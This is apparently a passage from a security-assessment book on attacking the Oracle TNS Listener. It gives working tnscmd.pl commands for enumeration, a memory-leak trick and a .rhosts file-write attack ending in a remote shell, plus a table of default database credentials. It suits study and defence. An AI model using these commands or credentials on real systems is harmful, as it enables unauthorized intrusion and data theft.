Here I describe user and database enumeration techniques, password grinding, and remote buffer overflow attacks launchable against the Oracle TNS Listener service.
The Transparent Network Substrate (TNS) protocol is used by Oracle clients to connect to database instances via the TNS Listener service. The service listens on TCP port 1521 by default (although it is sometimes found on ports 1526 or 1541) and acts as a proxy between database instances and the client system. Figure 8-6 shows an example Oracle web application architecture.
The listener service has its own authentication mechanism and is controlled and administered outside the Oracle database. In its default configuration, the listener service has no authentication set, which allows commands and tasks to be executed outside the database.
tnscmd.pl is an excellent tool you can use to interact with the TNS Listener. It's a Perl script that's available at http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd.
You can use tnscmd.pl to issue various commands to the TNS Listener service. Example 8-15 shows the default ping command being issued to the listener to solicit a response.
# perl tnscmd.pl -h 192.168.189.45 connect writing 87 bytes [(CONNECT_DATA=(COMMAND=ping))] .W.......6.,...............:................4.............(CONNECT_D ATA=(COMMAND=ping)) read ..."..=(DESCRIPTION=(TMP=)(VSNNUM=135294976)(ERR=0)(ALIAS=LISTENER)) eon
The VSNUM is the Oracle version number in decimal, which you can convert to hex. Figure 8-7 shows that the Base Converter application determines the version as 8.1.7.
You can issue a version command to the TNS Listener using tnscmd.pl, as shown in Example 8-16. In this case, I learn that the server is running Oracle 8.1.7 on Solaris.
# perl tnscmd.pl version -h 192.168.189.45 connect writing 90 bytes [(CONNECT_DATA=(COMMAND=version))] .Z.......6.,...............:................4.............(CONNECT_D ATA=(COMMAND=version)) read .M.......6.........-............(DESCRIPTION=(TMP=)(VSNNUM=135294976 )(ERR=0)).b........TNSLSNR.for.Solaris:.Version.8.1.7.0.0.-.Producti on..TNS.for.Solaris:.Version.8.1.7.0.0.-.Production..Unix.Domain.Soc ket.IPC.NT.Protocol.Adaptor.for.Solaris:.Version.8.1.7.0.0.-.Develop ment..Oracle.Bequeath.NT.Protocol.Adapter.for.Solaris:.Version.8.1.7 .0.0.-.Production..TCP/IP.NT.Protocol.Adapter.for.Solaris:.Version.8 .1.7.0.0.-.Production,,.........@ eon
The tnscmd.pl documentation written and maintained by James W. Abendschan at http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html lists a number of TNS Listener commands that can be executed remotely using the tool; they are listed in Table 8-4. I only summarize the tool and its use here, and recommend further investigation of tnscmd.pl if you are interested in Oracle security.
Command |
Notes |
---|---|
ping |
Pings the listener |
version |
Provides output of the listener version and platform information |
status |
Returns the current status and variables used by the listener |
debug |
Dumps debugging information to the listener log |
reload |
Reloads the listener config file |
services |
Dumps service data |
save_config |
Writes the listener config file to a backup location |
stop |
Shuts down the listener |
You can send a status command to the listener that returns a number of useful pieces of information. Example 8-17 shows this command being issued.
# perl tnscmd.pl status -h 192.168.189.46 connect writing 89 bytes [(CONNECT_DATA=(COMMAND=status))] .W.......6.,...............:................4.............(CONNECT_D ATA=(COMMAND=status)) writing 89 bytes read ........"..v.........(DESCRIPTION=(ERR=1153)(VSNNUM=135290880)(ERROR .........6.........`.............j........(DESCRIPTION=(TMP=)(VSNNUM =135290880)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)(VERSION=TNSLSNR.for .Solaris:.Version.8.1.6.0.0.-.Production)(START_DATE=01-SEP-2000.18: 35:49)(SIDNUM=1)(LOGFILE=/u01/app/oracle/product/8.1.6/network/log/l istener.log)(PRMFILE=/u01/app/oracle/product/8.1.6/network/admin/lis
The SECURITY=OFF setting within the information returned tells me that the TNS Listener is set with no authentication, and thus allows anonymous remote attackers to launch attacks with relative ease. It also retrieves LOGFILE details and many other variables that have been stripped for brevity.
An interesting vulnerability that was publicly reported by ISS X-Force in October 2000, but also found by James W. Abendschan, is that which occurs when the cmdsize variable of a given TNS Listener command request is falsified.
In Example 8-18, I send a standard 87 byte ping request to the listener, but report the cmdsize as being 256 bytes in total. The TNS Listener responds with over 380 bytes of data, containing hostname, SQL usernames, and other active session information. If I execute this same attack multiple times on a busy server, I will compromise most of the database usernames. The SQL*Net login process is handled by a child process, and so this memory leak issue doesn't reveal passwords.
# perl tnscmd.pl -h 192.168.189.44 --cmdsize 256 Faking command length to 256 bytes connect writing 87 bytes [(CONNECT_DATA=(COMMAND=ping))] .W.......6.,...............:................4.............(CONNECT_D ATA=(COMMAND=ping)) read ........"..v.........(DESCRIPTION=(ERR=1153)(VSNNUM=135290880)(ERROR _STACK=(ERROR=(CODE=1153)(EMFI=4)(ARGS='(CONNECT_DATA=(COMMAND=ping) )OL=TCP)(HOST=oraclesvr)(PORT=1541))(CONNECT_DATA=(SERVICE_NAME=pr01 )(CID=(PROGRAM=)(HOST=oraclesvr)(USER=oracle))))HOST=TOM)(USER=tom)) ))\ORANT\BIN\ifrun60.EXE)(HOST=ENGINEERING-1)(USER=Rick))))im6\IM60. EXE)(HOST=RICK)(U'))(ERROR=(CODE=303)(EMFI=1)))) eon
The following serious remote vulnerabilities are present in default TNS Listener configurations (i.e., with no authentication set), as listed in Table 8-5.
CVE name |
Date |
Notes |
---|---|---|
CVE-2002-0965 |
12/06/2002 |
Oracle 9i (Version 9.0.1) TNS Listener SERVICE_NAME stack overflow |
CVE-2002-0857 |
14/08/2002 |
Oracle 8i and 9i (Version 8.1.7 and 9.2.x) listener control utility (LSNRCTL) format string bug |
CVE-2002-0567 |
06/02/2002 |
Oracle 8i and 9i Version 8.1.7 and 9.0.1 and prior) TNS Listener ExtProc command execution vulnerability |
CVE-2001-0499 |
27/06/2002 |
Oracle 8i (Version 8.1.7 and prior) TNS Listener COMMAND stack overflow |
CVE-2000-0818 |
25/10/2000 |
Oracle 8i (Version 8.1.6 and prior) TNS Listener LOG_FILE command arbitrary file creation bug |
The Xfocus security team (http://www.xfocus.net) released an exploit for the pre-authentication COMMAND stack overflow in the Oracle TNS Listener, available at http://www.securityfocus.com/data/vulnerabilities/exploits/oracletns-exp.c.
Unfortunately, the exploit has been written with Chinese Windows 2000 SP2 and Oracle 8.1.7 offsets and memory addresses, and thus requires a degree of research before it can be effectively used to compromise remote English systems running various operating platforms and Oracle versions.
Oracle 8.1.6 and prior are vulnerable to a remote file creation attack that can result in a system compromise (depending on the amount of network access to the target server). By issuing a crafted log_file command, an attacker can create a .rhosts file in the oracle user's home directory. If you analyze the status response from 192.168.189.46 in Example 8-17, you will find this is /u01/app/oracle/. An attacker can then issue a command containing ASCII newline characters, and effectively write + + to a single line in the .rhosts file. Example 8-19 shows this attack in progress.
# perl tnscmd.pl -rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=) (HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VER SION=135294976)(VALUE=/u01/home/oracle/.rhosts)))" -h 192.168.189.46 # perl tnscmd.pl --rawcmd " + + " -h 192.168.189.46 # rsh -l oracle 192.168.189.46 csh -i Warning: no access to tty; thus no job control in this shell... oraclesvr%
If you look at the .rhosts file, it will look something like:
oraclesvr% cat /u01/home/oracle/.rhosts 21-MAR-2002 11:34:22 * log_file * 0 21-MAR-2002 11:34:23 * log_file * 0 21-MAR-2002 11:34:23 * 1153 TNS-01153: Failed to process string: + + NL-00303: syntax error in NV string
If you can communicate freely with the TNS Listener, you can attempt to connect to and authenticate with backend database instances. Oracle client utilities such as sqlplus, or open source equivalents such as Yet Another SQL*Plus Replacement (YASQL, available from http://sourceforge.net/projects/yasql/), can easily be fed SQL username and password combinations from a shell script or similar process. Some products, such as ISS Database Scanner (http://www.iss.net), can do this effectively on the commercial side. Table 8-6 contains a list of default, preinstalled Oracle database users and their passwords.
Username |
Password |
---|---|
ADAMS |
WOOD |
BLAKE |
PAPER |
CLARK |
CLOTH |
CTXSYS |
CTXSYS |
DBSNMP |
DBSNMP |
DEMO |
DEMO |
JONES |
STEEL |
MDSYS |
MDSYS |
MTSSYS |
MTSSYS |
ORDPLUGINS |
ORDPLUGINS |
ORDSYS |
ORDSYS |
OUTLN |
OUTLN |
SCOTT |
TIGER |
SYS |
CHANGE_ON_INSTALL |
SYSTEM |
MANAGER |
Phenoelit's excellent Default Password List (DPL) contains a number of other common Oracle passwords, accessible at http://www.phenoelit.de/dpl/dpl.html.
If you are going to brute-force Oracle user passwords and compromise database instances, you need a decent understanding of the SQL*Plus client to be able to navigate around the database and or do anything productive.
For effective results for novices wishing to abuse default Oracle passwords to gain underlying system access, the Oracle Auditing Tools (OAT) package is available for Win32 platforms at http://www.cqure.net/tools.jsp?id=7.
In particular, the OAT toolkit contains simple scripts you can use to execute commands, upload and download files via TFTP, and dump the SAM database of Windows-based Oracle servers.
As mentioned earlier in this chapter, MetaCoretex (http://www.metacoretex.com) is a Java database vulnerability scanner. In particular, the scanner has a number of pre- and post-authentication Oracle probes. In particular, some useful remote tests are:
TCP bounce port scanning through the Oracle database using UTL_TCP
Oracle SID enumeration
TNS security settings and status